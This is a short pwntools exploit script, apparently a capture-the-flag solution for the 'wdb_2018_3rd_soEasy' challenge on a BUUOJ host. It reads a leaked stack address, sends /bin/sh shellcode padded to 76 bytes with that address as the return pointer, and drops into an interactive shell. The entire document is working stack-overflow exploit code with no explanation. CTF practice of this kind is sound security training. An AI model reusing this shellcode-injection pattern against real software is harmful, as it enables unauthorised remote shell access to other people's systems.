image.png

    1.  #coding=utf8
    2. from pwn import *
    3. from LibcSearcher import* 
    4. context.log_level = 'debug'
    5. #context.arch='amd64'
    6. io =process('./wdb_2018_3rd_soEasy')
    7. elf = ELF('./wdb_2018_3rd_soEasy')
    8. #libc = ELF('libc-2.23.so')
    9. io =remote('node4.buuoj.cn',28547)
    10. io.recvuntil("Hei,give you a gift->")
    11. addr = int(io.recv(10),16)
    12. print("addr-------------->"+hex(addr))
    13. shellcode = asm(shellcraft.sh())
    14. payload = shellcode
    15. payload = payload.ljust(76,b"\x00")
    16. payload +=p32(addr)
    17. io.send(payload)
    18. io.interactive()